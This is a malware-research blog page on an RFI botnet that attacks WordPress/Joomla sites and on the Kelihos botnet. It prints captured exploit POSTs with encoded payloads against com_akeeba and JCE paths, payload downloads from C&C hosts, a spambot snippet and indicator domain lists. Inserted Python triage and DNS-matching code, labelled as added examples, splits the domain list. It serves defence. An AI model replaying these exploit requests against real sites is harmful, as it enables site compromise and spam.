78 | Tapaoux                                           |
79 | Tarsip Eclipse                                    |
80 | Tarsip Moon                                       |
81 | Variant Letsgo / TabMsgSQL downloader (comment crew) |
82 | Vinself                                           |
83 | WEBC2_RAVE                                        |
84 | WEBC2-Bolid                                       |
85 | WEBC2-Clover                                      |
86 | WEBC2-CSON                                        |
87 | WEBC2-CSON Response to commands                   |
88 | WEBC2-HEAD                                        |
89 | WEBC2-Table                                       |
90 | Xtreme Rat                                        |

Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3, VirusTotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) - 7958f73daf4b84e3b00e008258ea2e7a, VirusTotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08, VirusTotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners often get alerted about copious amounts of meds and porn spam emanating from their sites). These scripts are also the source of the varied spam links: thousands of different URLs that all redirect to the same sites (e.g. weight-loss, work-at-home scams, or porn sites).

The "hackers" attacking the Wordpress servers are armies of compromised Windows desktops continuously checking the C&C servers for new targets. This is why cleaned but not fully patched/secured sites get compromised over and over. It is trivial for a site owner to discover the malicious PHP script on their server; it is much harder to discover how the server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed the RAM to be easily captured and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org 

The unpacked version of conhost.exe (7958F73DAF4B84E3B00E008258EA2E7A) contains a Base94 alphabet, which is used, in addition to common Base64, for encoding strings and communication requests:

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

1. Examining the pcap shows the initial communication with 'www.wholists.org' on 95.163.104.69 (initial callback):

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org', where it requests 'conh11.jpg' for download. We see that it is actually a Win32 executable rather than a JPG file. The file has MD5 hash 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal.
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3. Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb", to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php:
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

Several PHP scripts were observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected into a vulnerable server. We link here to the PHP scripts we saw in use by this malware. The presence of any of these scripts on a CMS web server is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities, for example the com_akeeba and JCE paths seen in the POST requests below.
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- "OK" followed by the MD5 hash of "1234567890"
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].org
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

3a. Linux20+cfcd208495d565ef66e7dff9f98764da -- the failure response of the sm14e.php spam bot script ("die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));") on an already compromised host; it returns the OS name followed by the MD5 of "0" (the leading zero makes 0987654321 an octal literal, and PHP 5 stops at the invalid digit 9, so the value is 0). Other variants include:

  • WINNT20+cfcd208495d565ef66e7dff9f98764da+6+([redacted]ston66@yahoo.com)+554
  • FreeBSD20+cfcd208495d565ef66e7dff9f98764da+1
  • Linux20+cfcd208495d565ef66e7dff9f98764da+1

POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

Linux20+cfcd208495d565ef66e7dff9f98764da+4+([redacted]@gmail.com)+550-5.1.1 The email account that you tried to reach does not exist. Please try|550-5.1.1 double-checking the recipient's email address for typos or|550-5.1.1 unnecessary spaces. Learn more at|550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 x2si10031694eef.106 - gsmtp|
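The three response shapes above are a usable classifier for anyone reviewing captures of this traffic: "OK" plus the MD5 of "1234567890" means the posted payload was accepted, an OS name plus the MD5 of "0" (optionally followed by more "+"-separated fields) means the injected spam bot script is already answering on that host, and the Mod_Security "Not Acceptable" page means the request was blocked. The code below is an added example written for this post, not code from the original page; it recomputes both MD5 values with hashlib so the page's claim about them can be checked, classifies a response, and matches request paths against the three module paths seen in the captured POSTs. The sample captures are constructed from the responses shown above, with a placeholder e-mail address.

```python
"""Triage of bot-to-CMS responses observed in this post.

Added example; not code from the original post. Path list and response
shapes come from the captured traffic above; samples are constructed.
"""
import hashlib
import re

MD5_ACCEPTED_TOKEN = hashlib.md5(b"1234567890").hexdigest()  # e807f1fc...
MD5_ZERO = hashlib.md5(b"0").hexdigest()                     # cfcd2084...

ACCEPTED_RE = re.compile(r"^OK([0-9a-f]{32})\+(\d+)\s*$")
PROBE_RE = re.compile(r"^([A-Za-z]+)(\d+)\+([0-9a-f]{32})(?:\+(.*))?$", re.DOTALL)

# Module paths that appeared as POST targets in the captured traffic above.
TARGETED_PATH_SUFFIXES = (
    "/administrator/components/com_akeeba/assets/javascript.php",
    "/plugins/editors/jce/libraries/classes/json/defines.php",
    "/plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php",
)


def is_targeted_path(path: str) -> bool:
    """True when the request path ends with one of the observed module paths."""
    path = path.split("?", 1)[0]
    return any(path.endswith(suffix) for suffix in TARGETED_PATH_SUFFIXES)


def classify_response(status: int, body: str) -> dict:
    """Map one HTTP response (status code, body text) to an analyst verdict."""
    body = body.strip()
    m = ACCEPTED_RE.match(body)
    if m:
        return {
            "verdict": "payload_accepted",
            "token_is_md5_of_1234567890": m.group(1) == MD5_ACCEPTED_TOKEN,
            "counter": int(m.group(2)),
        }
    m = PROBE_RE.match(body)
    if m and m.group(3) == MD5_ZERO:
        # Fields after the hash are '+'-separated (count, mailbox, SMTP reply...).
        extra = m.group(4).split("+") if m.group(4) else []
        return {"verdict": "spambot_already_present", "os": m.group(1), "extra_fields": extra}
    if status == 406 or "Mod_Security" in body:
        return {"verdict": "blocked"}
    return {"verdict": "unknown"}


def triage(captures):
    """captures: iterable of (path, status, body). Returns verdict counts for targeted paths."""
    counts = {}
    for path, status, body in captures:
        if not is_targeted_path(path):
            continue
        verdict = classify_response(status, body)["verdict"]
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


# Constructed captures mirroring the three responses documented above; the
# e-mail address is a placeholder, not one from the capture.
SAMPLE_CAPTURES = [
    ("/site/administrator/components/com_akeeba/assets/javascript.php", 200,
     "OKe807f1fcf82d132f9bb018ca6738a19f+0"),
    ("/plugins/editors/jce/libraries/classes/json/defines.php", 406,
     "Not Acceptable! An appropriate representation of the requested resource "
     "could not be found on this server. This error was generated by Mod_Security."),
    ("/plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php", 200,
     "Linux20+cfcd208495d565ef66e7dff9f98764da+4+(user@example.invalid)+550-5.1.1 "
     "The email account that you tried to reach does not exist."),
    ("/wp-login.php", 200, "<html>login form</html>"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_CAPTURES))
```

Run over a full capture, triage() reproduces the kind of ratio the post reports (accepted versus blocked), and the spambot_already_present verdict is the one to act on first, since that host is already sending mail for the botnet.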



Hosting Infrastructure 


The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure


Domain                   IP Address       ASN      Network Name
wholists.org             95.163.104.69    AS12695  Digital Networks CJSC
gettrial.store-apps.org  95.163.104.94    AS12695  Digital Networks CJSC
t22.run-stat.org         95.163.104.69    AS12695  Digital Networks CJSC
seek4.run-stat.org       46.165.230.185   AS16265  Leaseweb
bt.ads-runner.org        208.115.109.53   AS23033  Wowrack
fw.point-up.org          85.143.166.221   AS56534  PIRIX-CORPNET-2


Passive DNS

95.163.104.69       95.163.104.94            46.165.230.185       208.115.109.53        85.143.166.221
www.wholists.org    ns1.wholists.org         ns1.upsave.info      ntp.run-stat.org      fw.point-up.org
bns.wholists.org    ns1.store-apps.org       fw.stat-run.info     bt.ads-runner.org     ns2.memrem.ru
gjd.wholists.org    ns1.games-olympic.org    fw.run-stat.org      sk4.ads-runner.org    ns2.nalkanet.ru
lbh.wholists.org    ns1.googleminiapi.com    mail.stat-run.info   ntp.stat-run.info     ns2.nallanite.ru
qdp.wholists.org    peace.vijproject.com     bt2.run-stat.org                           vm.clodoserver.ru
www.techsign.org    sogood.vitaminavip.com   jc.upsave.info
ml.inviteyou.info   img.stat-run.info        ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 & 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013 (graph)
Peering for AS12695 - May, 2013 (graph)

In January, we see that for the prefix 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May they added AS31133.

AS3216 - SOVAM-AS OJSC Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013 (graph)
Peering for AS23033 - May, 2013 (graph)

For the prefix 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013 (graph)
Peering for AS56534 - May, 2013 (graph)

In January, for the prefix 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534


Monday, May 6, 2013

Library of Malware Traffic Patterns


Image: Harry Potter and the Sorcerer's Stone (movie)

Update May 6, 2013: We added the ability to download corresponding samples and pcaps (when available). Same password scheme as Contagio. Email Mila if needed.

Traffic analysis has been the primary method of malware identification, and the thousands of IDS signatures developed are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as a "personal notes" spreadsheet with GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.


This list is not meant to be the only way to identify malware families; it is an aid and reference. We will be adding data from our own research and online publications. (Hint: please send us links to add.)

The references column is a good source of links for malware analysis or resources for different families. The second tab, "EZ Lookup", offers a more condensed view which allows easier sorting. The Links tab gives a resource list, and the TBD tab shows entries for malware for which we don't have common/public names. The list features all types of malware: cybercrime, APT and hacktivism.

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS" SPREADSHEET 


To download (you might miss updates if you decide to use a static copy), click File - Download As in the spreadsheet view. To sort any column, click View - List. Your sorting will not affect other visitors.


If you think you can and wish to contribute, or have any comments or corrections, please email Andre' or Mila.

Monday, February 25, 2013

Yara Resources

Yara Project by Víctor Manuel Álvarez

Yara Exchange Google Group - exchange yara signatures, tools, resources, and ideas. 170+ members as of Feb. 2013

Notable Yara related publications by date:

Sunday, February 10, 2013

Trojan Nap aka Kelihos/Hlux - Feb. 2013 Status Update



Update Feb 11, 2012, regarding media headlines that it is a "new version":
Please note that this post is a "status update" on the growth of the Kelihos botnet. It is the same botnet and malware as we saw last year. The goal of the post is to highlight the rapid re-growth after the March 2012 takedown and to share the recent known domain/name server data.

FireEye posted details about the sleep function found in Kelihos/Hlux (An encounter with Trojan Nap), which is interesting, and indeed is present in some of the samples we saw. The trojan, of course, has many more features, and most of them were documented in previous publications online. This post is a quick update on the state of the Kelihos/Hlux botnet, along with the list of known fast flux domains (1500+) associated with Kelihos distribution or Command & Control (current > 2012). The current and most active name servers are pointing to ns[1-6].boomsco.com, ns[1-6].larstor.com, and ns[1-6].zempakiv.ru, which are also fast flux domains. The double fast flux nature of the botnet makes it very difficult to take down, and sinkholing is a temporary measure. Despite the two large attempts to take it down (Sep. 2011 and Mar. 2012), the botnet is definitely on the rise again.

Previously published research about Kelihos

Jan. 2013 - Beware of Kelihos-2? - Portable Apps member note

List of recent MD5 hashes (you can download this sample set from Contagio; there are 95 files).


List of files sorted by PE header TimeDateStamp. It is not always indicative of age, since the time stamp can be faked (and in this case all samples are recent, 2012-2013), but it can be helpful for finding variants.


Some of the domains we saw in the binaries above (see the full list of associated domains below):
akpuxqaz.ru
apnifosa.ru
bugfivin.ru
cagremub.ru
diqnawug.ru
dufyhive.ru
jiwviqpa.ru
merwiqca.ru
wowrizep.ru

Traffic information

GET /instcod.exe HTTP/1.0
Host: wowrizep.ru

HTTP/1.1 200 Ok
Server: Apache
Content-Length: 785920
Content-Type: application/octet-stream
Last-Modified: .., 06 ... 2013 13:47:52 GMT
Accept-Ranges: bytes

MZ......................@...................................|...........!..L.!..This program must be run under Win32

Domains associated with Kelihos distribution and CnC

The HTTP request is still incomplete in this example (as described here: http://www.abuse.ch/?p=3658).
URL:  http://wowrizep.ru/instcod.exe
TYPE: GET
UA:   None
URL:  http://jiwviqpa.ru/instcod.exe
TYPE: GET
wowrizep.ru
nserver:       ns2.larstor.com.  (other name servers listed below)
nserver:       ns3.larstor.com.
nserver:       ns4.larstor.com.
nserver:       ns5.larstor.com.
nserver:       ns6.larstor.com.
state:         REGISTERED, NOT DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.12.22
paid-till:     2013.12.22
free-date:     2014.01.22

Over 6 hours, one infected machine had communications with over 1550 peers (unique IPs). Traffic flow shown from our sandbox IP in San Francisco, CA.



Known domains associated with Kelihos/Hlux distribution and command&control servers (Feb. 2013-2012)


Hundreds of domains pointing to these name servers are listed below as one list. If you see ".com" in the list, this is a name server and is where the next batch of domains begins. You should see batches for these name servers (1500+ domains) that are associated with Redkit, Blackhole and other exploit kits, mostly delivering Kelihos/Hlux and sometimes Virut, which has been associated with this botnet as well (Jan. 2013 - Waledac Gets Cozy with Virut - Symantec). Some domains were moved to new name servers as the old ones were suspended (for example, many domains were moved from ns[1-6].systeat.com to ns[1-6].turbusy.com).

Compare it to the usage of eu domains from the last year here http://www.abuse.ch/?p=3658.

RU domains

  • ns[1-6].boomsco.com - domains registered on 2013-01-13 << most active now
  • ns[1-6].larstor.com - domains registered on 2012-12-22 << most active now
  • ns[1-6].berchae.com (suspended) - domains registered on 2012-12-21
  • ns[1-6].zempakiv.ru - domains registered on 2012-12-07 << most active now
  • ns[1-6].newrect.com - domains registered on 2012-08-01
  • ns[1-6].turbusy.com - domains registered on 2012-12-07
  • ns[1-6].chokode.com (suspended) - domains registered on 2012-09-06
  • ns[1-6].biocruc.com (suspended) - domains registered on 2012-07-15
  • ns[1-6].systeat.com (suspended) - domains registered on 2012-07-07
  • ns[1-6].affour.com (suspended) - domains registered on 2012-06-29
  • ns[1-6].reetsp.com (suspended) - domains registered on 2012-06-29
  • ns[1-6].oparle.com - domains registered on 2012-06-05
  • ns[1-6].toastop.com (suspended) - domains registered on 2012-05-27
  • ns[1-6].ocorti.com (suspended) - domains registered on 2012-04-21
  • ns[1-6].esanty.com (suspended) - domains registered on 2012-04-09
  • ns[1-6].diastr.com (suspended) - domains registered on 2012-04-09
  • ns[1-6].snapoli.com (suspended) - domains registered on 2012-04-02
  • ns[1-6].maguiso.com (suspended) - domains registered on 2012-03-05
  • ns[1-6].swartra.com - domains registered on 2011-10-12

EU domains

  • ns[1-6].frostli.com (suspended) - domains registered on 2012-04-21
  • ns[1-6].pizzebu.com (suspended) - domains registered on 2012-01-13

IN domains

  • ns[1-6].firstara.com - domains registered on 2012-03-08

CE.MS domains (used before 2012)

  • ns[1-6].roblect.com - domains registered on 2011-12-01
  • ns[1-6].galloma.com - domains registered on 2011-10-31
Domain list

All known domains sorted by name server and age (newest on top; see the name server registration dates above). If you see any machines connecting to any of these domains, they are likely infected. Listed by name server and NS creation date. There are some duplicates in the list, as the same domain could move from one NS to another.

Download:
http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt - txt file with 430+ domains using the currently active name servers => for active defense:
boomsco.com
larstor.com
zempakiv.ru
newrect.com
turbusy.com

http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt - txt file with all 1550+ Kelihos domains known to us, including suspended and sinkholed ones (2011-2013), sorted by age (newest to oldest) => for DNS monitoring and research.

There are 1550+ unique domains.
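The list format described above (a name-server header, then the domains delegated to it, with a domain repeated wherever it moved between name servers) lends itself to a small DNS-log matcher for the "DNS monitoring" use the post suggests. This is an added example, not code from the post; the domain list excerpt and query-log lines are constructed, and only the domain and name-server names in them come from the post's list.

```python
"""Match DNS query logs against a Kelihos-style domain list (added example, not
code from the post; SAMPLE_LIST and SAMPLE_LOG are constructed, with only the
domain and name-server names taken from the post's list)."""
import re

# Name servers the post marks as currently active ("for active defense").
ACTIVE_NS = {"boomsco.com", "larstor.com", "zempakiv.ru", "newrect.com", "turbusy.com"}

# Constructed excerpt in the post's format: a header naming the name server,
# then the domains delegated to it.  aletazgi.ru is listed twice because it
# moved from the suspended systeat.com to the active turbusy.com.
SAMPLE_LIST = """\
ns[1-6].larstor.com
jiwviqpa.ru
wowrizep.ru

ns[1-6].systeat.com
aletazgi.ru

ns[1-6].turbusy.com
aletazgi.ru

reetsp.com
adnedat.ru

ns[1-6]affour.com
arvomxo.ru
"""

# Constructed query log, one query per line: "<timestamp> <client> <qtype> <qname>".
SAMPLE_LOG = """\
2013-02-10T09:14:02Z 10.0.0.5 A wowrizep.ru
2013-02-10T09:14:03Z 10.0.0.5 A www.example.com
2013-02-10T09:15:10Z 10.0.0.7 A aletazgi.ru
2013-02-10T09:16:44Z 10.0.0.9 A mail.arvomxo.ru.
"""

# Headers such as "ns[1-6].boomsco.com", "ns2.oilined.com" or "ns[1-6]affour.com".
_HEADER_RE = re.compile(r"^ns(?:\[\d-\d\]|\d+)\.?([a-z0-9.-]+)$")


def header_name_server(line):
    """Return the bare name-server domain if `line` starts a batch, else None.
    A bare .com entry such as "reetsp.com" also starts a batch, as the post notes."""
    m = _HEADER_RE.match(line)
    if m:
        return m.group(1)
    return line if line.endswith(".com") else None


def parse_domain_list(text):
    """Map each listed domain to the ordered name servers it was delegated to."""
    index, current_ns = {}, None
    for raw in text.splitlines():
        line = raw.strip().lower()
        if not line:
            continue
        ns = header_name_server(line)
        if ns is not None:
            current_ns = ns
        elif current_ns is not None:  # a domain before any header is skipped
            servers = index.setdefault(line, [])
            if current_ns not in servers:
                servers.append(current_ns)
    return index


def match_domain(qname, index):
    """Return the listed domain that `qname` equals or sits under, or None."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):  # never match on the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in index:
            return candidate
    return None


def scan_dns_log(lines, index):
    """Return one hit per query whose name falls under a listed domain."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, _qtype, qname = parts[:4]
        matched = match_domain(qname, index)
        if matched is None:
            continue
        servers = index[matched]
        hits.append({
            "time": ts, "client": client, "qname": qname.rstrip("."),
            "matched": matched, "name_servers": servers,
            # Active if ever delegated to a name server the post lists as in use.
            "active": any(ns in ACTIVE_NS for ns in servers),
        })
    return hits


def run_example():
    """Scan the constructed log against the constructed list."""
    return scan_dns_log(SAMPLE_LOG.splitlines(), parse_domain_list(SAMPLE_LIST))
```

A hit whose name servers are all suspended is still worth a look, since a suspended name server only means the domain no longer resolves, not that the host querying it is clean.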
denapgo.ru
dodexco.ru
dydajej.ru
ebmekis.ru
ebmeqbe.ru
ehmyqaq.ru
eqsonas.ru
ezhimim.ru
figbuar.ru
fyefxug.ru
hecrery.ru
huckazu.ru
hyqugry.ru
hysgofy.ru
ilmagih.ru
imkaqro.ru
iwahroq.ru
ixomzob.ru
jabyrid.ru
kylqaoq.ru
lihibir.ru
meewxib.ru
miwywky.ru
ophopop.ru
papiteb.ru
pyhozod.ru
qawumqi.ru
